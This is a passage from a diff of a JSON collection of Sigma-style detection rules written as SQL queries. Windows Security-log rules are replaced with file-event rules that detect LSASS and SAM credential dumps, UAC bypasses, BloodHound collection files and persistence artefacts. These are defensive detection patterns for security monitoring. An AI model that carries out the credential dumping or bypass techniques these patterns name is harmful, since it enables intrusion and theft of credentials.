'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", + "status": "experimental", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", - "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "status": "experimental", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Initial installation of a domain controller" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" ], - "filename": "win_security_susp_dsrm_password_change.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "Login with WMI", - "id": "5af54681-df95-4c26-854f-2565e13cfab0", - "status": "stable", - "description": "Detection of logins performed with WMI", - "author": "Thomas Patzke", + "title": "New Shim Database Created in the Default Directory", + "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", + "status": "test", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Monitoring tools", - "Legitimate system administration" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND ProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" ], - "filename": "win_security_susp_wmi_login.yml" + "filename": "file_event_win_creation_new_shim_database.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", - "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "status": "experimental", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1564" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", - "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "title": "BloodHound Collection Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "status": "experimental", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", - "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Some false positives may arise in some environment and this may require some tuning. Add addional filters or reduce level depending on the level of noise" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "UAC Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" - ], - "filename": "win_security_susp_rottenpotato.yml" - }, - { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "title": "ScreenConnect Temporary Installation Artefact", + "id": "fec96f39-988b-4586-b746-b93d59fd1922", "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Intended inclusions by administrator" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\'" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_screenconnect_artefact.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "title": "Writing Local Admin Share", + "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1546.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_writing_local_admin_share.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", - "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "status": "experimental", + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1542.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "Denied Access To Remote Desktop", - "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", + "title": "Startup Folder File Write", + "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", "status": "test", - "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", - "author": "Pushkarev Dmitry", + "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Valid user was not added to RDP group" + "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" - ], - "filename": "win_security_not_allowed_rdp_access.yml" - }, - { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", - "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", - "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" - ], - "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_startup_folder_file_write.yml" }, { - "title": "DPAPI Domain Master Key Backup Attempt", - "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "status": "test", - "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.defense_evasion", + "attack.t1105" ], "falsepositives": [ - "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "status": "experimental", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1098", - "attack.persistence" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_lsass_werfault_dump.yml" }, { - "title": "SCM Database Handle Failure", - "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", + "title": "Potential SAM Database Dump", + "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects non-system users failing to get a handle of the SCM database.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1010" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Rare cases of administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel 